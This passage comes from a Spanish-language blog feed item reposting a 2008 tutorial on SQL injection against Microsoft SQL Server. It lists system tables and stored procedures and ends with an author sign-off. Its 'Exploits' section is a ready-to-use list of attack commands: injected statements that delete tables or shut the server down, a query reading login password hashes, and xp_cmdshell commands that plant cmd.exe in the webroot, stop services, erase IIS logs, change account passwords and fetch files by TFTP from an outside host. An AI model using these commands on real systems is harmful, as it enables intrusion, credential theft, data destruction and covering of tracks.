ficheros en sí.&lt;br /&gt;- sysfiles, almacenan los ficheros físicos en sí con su ruta correspondiente.&lt;br /&gt;- sysforeignkeys, almacenan las claves foráneas de la BD.&lt;br /&gt;- sysfulltextcatalogs, guarda información de los catálogos de sistema.&lt;br /&gt;- sysindexes, guarda todas las indexaciones de combinaciones de campos sobre tablas de la BD.&lt;br /&gt;- syspermissions, guarda permisos sobre los objetos de la BD.&lt;br /&gt;- sysproperties, guarda descripciones de tablas y campos del modelo relacional.&lt;br /&gt;- sysprotectsque, guarda información de permisos asociados a las cuentas de seguridad de la BD.&lt;br /&gt;- sysreferences, guarda la información de las relaciones entre tablas de la BD.&lt;br /&gt;- systypes, tipos de datos posbiles a definir en el gestor de BDsystypes.&lt;br /&gt;- sysusers, roles de inicios de sesión posibles en la BD.&lt;br /&gt;&lt;br /&gt;- sysfulltextnotify, syscursocolumns, syscursorrefs, syscursors, syscursortables, sysfiles1,&lt;br /&gt;  syslocks, sysxlogins, etc...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x06: Procedimientos ]--- #######&lt;br /&gt;&lt;br /&gt;sp_addalias &lt;br /&gt;sp_addapprole &lt;br /&gt;sp_addgroup &lt;br /&gt;sp_addlinkedsrvlogin &lt;br /&gt;sp_addlogin &lt;br /&gt;sp_addrole &lt;br /&gt;sp_addrolemember &lt;br /&gt;sp_addumpdevice &lt;br /&gt;sp_adduser &lt;br /&gt;sp_altermessage &lt;br /&gt;sp_approlepassword &lt;br /&gt;sp_change_users_login &lt;br /&gt;sp_changedbowner &lt;br /&gt;sp_changegroup &lt;br /&gt;sp_changeobjectowner &lt;br /&gt;sp_configure &lt;br /&gt;sp_dbcmptlevel &lt;br /&gt;sp_dboption (update) &lt;br /&gt;sp_dboption update part &lt;br /&gt;sp_defaultdb &lt;br /&gt;sp_defaultlanguage &lt;br /&gt;sp_denylogin &lt;br /&gt;sp_diskdefault &lt;br /&gt;sp_dropalias &lt;br /&gt;sp_dropapprole &lt;br /&gt;sp_dropdevice &lt;br /&gt;sp_dropgroup &lt;br /&gt;sp_droplinkedsrvlogin &lt;br /&gt;sp_droplogin &lt;br /&gt;sp_dropremotelogin &lt;br /&gt;sp_droprole &lt;br /&gt;sp_droprolemember &lt;br /&gt;sp_dropuser &lt;br /&gt;sp_fulltext_catalog &lt;br /&gt;sp_fulltext_column &lt;br /&gt;sp_fulltext_database &lt;br /&gt;sp_fulltext_service &lt;br /&gt;sp_fulltext_table &lt;br /&gt;sp_grantdbaccess &lt;br /&gt;sp_grantlogin &lt;br /&gt;sp_helplogins &lt;br /&gt;sp_password &lt;br /&gt;sp_recompile &lt;br /&gt;sp_refreshview &lt;br /&gt;sp_remoteoption &lt;br /&gt;sp_remoteoption (update) &lt;br /&gt;sp_rename &lt;br /&gt;sp_renamedb &lt;br /&gt;sp_revokedbaccess &lt;br /&gt;sp_revokelogin &lt;br /&gt;sp_tableoption &lt;br /&gt;sp_updatestats&lt;br /&gt;&lt;br /&gt;(BOF)--&gt;&lt;br /&gt;&lt;br /&gt;xp_controlqueueservice&lt;br /&gt;xp_createprivatequeue&lt;br /&gt;xp_createqueue&lt;br /&gt;xp_decodeq ueuecmd&lt;br /&gt;xp_deleteprivatequeue&lt;br /&gt;xp_deletequeue&lt;br /&gt;xp_displayqueuemesgs&lt;br /&gt;xp_dsninfo&lt;br /&gt;xp_mergelineages&lt;br /&gt;xp_oledbinfo&lt;br /&gt;xp_proxiedmetadata&lt;br /&gt;xp_readpkfromqueue&lt;br /&gt;xp_readpkfromvar bin&lt;br /&gt;xp_repl_encrypt&lt;br /&gt;xp_resetqueue&lt;br /&gt;xp_sqlinventory&lt;br /&gt;xp_unpackcab &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x07: Exploits ]--- #######&lt;br /&gt;&lt;br /&gt;- Nombres de las distintas base de datos existentes en el gestor de BD:&lt;br /&gt;    use master select * from sysdatabases&lt;br /&gt;&lt;br /&gt;- Obtenemos todas las tablas de todas las base de datos:&lt;br /&gt;    select * from sysobjects where xtype = 'U'&lt;br /&gt;&lt;br /&gt;- Obtenemos los nombres de todas las tablas contenidas en la base de datos ('x'):&lt;br /&gt;    use 'x' select * from sysobjects where xtype = 'U'&lt;br /&gt;    use users select * from sysobjects where xtype = 'U'&lt;br /&gt;&lt;br /&gt;- Obtenemos todo el código TSQL dado de alta en la BD:&lt;br /&gt;    select * from syscomments&lt;br /&gt;&lt;br /&gt;- Obtenemos los procedimientos almacenados que usan las tablas o campos donde se manejan cuentas:&lt;br /&gt;    select * from syscomments where text like '%cuentas%'&lt;br /&gt;&lt;br /&gt;- Obtenemos el inicio de sesión actual:&lt;br /&gt;    select current_user&lt;br /&gt;&lt;br /&gt;- Obtenemos el usuario de la Base de Datos:&lt;br /&gt;    select user&lt;br /&gt;&lt;br /&gt;- Obtenemos la versión de SQL Server:&lt;br /&gt;    select @@version&lt;br /&gt;&lt;br /&gt;- Obtenemos la fecha actual del servidor:&lt;br /&gt;    select getdate()&lt;br /&gt;&lt;br /&gt;- Información referente a los inicios de sesión del gestor de base de datos:&lt;br /&gt;    use master select name from sysxlogins&lt;br /&gt;    select name, password from sysxlogins&lt;br /&gt;&lt;br /&gt;- Bases de datos existentes en el servidor:&lt;br /&gt;    use master select name from sysdatabases&lt;br /&gt;&lt;br /&gt;- Leer archivos del sistema:&lt;br /&gt;    exec master..xp_readerrorlog 1,N'c:\boot.ini'&lt;br /&gt;&lt;br /&gt;- Leer el registro de Windows:&lt;br /&gt;    exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Setup','SQLpath'&lt;br /&gt;    exec xp_instance_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Setup','SQLpath'&lt;br /&gt;&lt;br /&gt;- Utilización de waitfor:&lt;br /&gt;    select * from 'x' waitfor delay '00:00:10'&lt;br /&gt;    select * from users waitfor delay '00:00:10'&lt;br /&gt;&lt;br /&gt;- Denegación de servicio:&lt;br /&gt;    '; delete table usuarios--&lt;br /&gt;    '; xp_cmdshell ('shutdown')--&lt;br /&gt;&lt;br /&gt;- Consultar y alterar archivos en el servidor:&lt;br /&gt;    exec master..xp_cmdshell 'COPY c:\winnt\system32\cmd.exe c:\inetpub\wwwroot\chroot.exe'&lt;br /&gt;    exec master..xp_cmdshell 'DIR c:\winnt\system32\logfiles\w3svc1\'&lt;br /&gt;&lt;br /&gt;- Parar servicios:&lt;br /&gt;    exec master..xp_cmdshell 'NET STOP "Servicio de publicación de World Wide Web"'&lt;br /&gt;&lt;br /&gt;- Borrado de huellas:&lt;br /&gt;    exec master..xp_cmdshell 'DEL c:\winnt\system32\logfiles\w3svc1|filelog.log'&lt;br /&gt;&lt;br /&gt;- Iniciar un servicio:&lt;br /&gt;    exec master..xp_cmdshell 'NET START "Servicio de publicación de World Wide Web"'&lt;br /&gt;&lt;br /&gt;- Cambiar datos de la cuenta de usuarios de Windows:&lt;br /&gt;    exec master..xp_cmdshell 'NET USER username password'&lt;br /&gt;&lt;br /&gt;- Añadir un usuario al inicio de sesión del gestor de base de datos:&lt;br /&gt;    'exec master..sp_addlogin MyUser, MyPass&lt;br /&gt;&lt;br /&gt;- Mover archivos desde otras ubicaciones:&lt;br /&gt;    execute master..xp_cmdshell 'TFTP -i www.spanish-hackers.com GET c:\local_file c:\remote_file'&lt;br /&gt;&lt;br /&gt;- Creación de consultas encriptadas:&lt;br /&gt;    create procedure 'x' with encryption as select * from users&lt;br /&gt;    create procedure pp with encryption as select * from users&lt;br /&gt;&lt;br /&gt;- Rootkits:&lt;br /&gt;    use master exec sp_addextendedproc 'mi_rootkit', 'c:\Archivos de programa\Microsoft SQLServer\&lt;br /&gt;    MSSQL\Binn\xplog70.dll' GO&lt;br /&gt;&lt;br /&gt;- Backup:&lt;br /&gt;    '; use master BACKUP DATABASE [master] TO DISK = N'C:\h' WITH NOINIT, NOUNLOAD, NAME = N'C', &lt;br /&gt;    NOSKIP, STATS = 10, NOFORMAT--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x08: JosS ]--- #######&lt;br /&gt;&lt;br /&gt;Jose Luis Góngora Fernández (JosS)&lt;br /&gt;&lt;br /&gt;In memory of rgod.&lt;br /&gt;&lt;br /&gt;Take care,&lt;br /&gt;/JosS&lt;br /&gt;&lt;br /&gt;# spanish-hackers.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-4458891539603498450?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/ZQItm0T1M-w" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-09-25T01:04:03.595-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/09/ms-sql-injecting-tsql-commands-by-joss.html</feedburner:origLink></item></channel></rss>
